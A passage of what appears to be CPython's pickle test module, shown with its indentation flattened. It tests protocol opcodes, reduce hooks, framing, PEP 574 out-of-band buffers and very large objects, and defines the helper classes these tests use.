n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in protocols:
self.assertRaises(RuntimeError, self.dumps, x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
# Test compacity of int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
@support.skip_if_pgo_task
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
# A single frame for small objects between
# first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
# Large byte objects (dict values) intermittent with small objects
# (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
@support.skip_if_pgo_task
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
# but not too many either: there can be one for the proto,
# one per-frame header, one per frame for the actual contents,
# and two for the header.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
# There shouldn't bee too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when looking up
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
def buffer_like_objects(self):
# Yield buffer-like objects with the bytestring "abcdef" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
# Return a true value from buffer_callback should have
# the same effect
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
# Non iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
def test_inband_accept_default_buffers_argument(self):
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data_pickled = self.dumps(1, proto, buffer_callback=None)
data = self.loads(data_pickled, buffers=None)
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
class BigmemPickleTests(unittest.TestCase):
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1-byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_dump_text_file(self):
f = open(TESTFN, "w")
try:
for proto in protocols:
self.assertRaises(TypeError, self.dump, 123, f, proto)
finally:
f.close()
support.unlink(TESTFN)
def test_incomplete_input(self):
s = io.BytesIO(b"X''.")
self.assertRaises((EOFError, struct.error, pickle.UnpicklingError), self.load, s)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
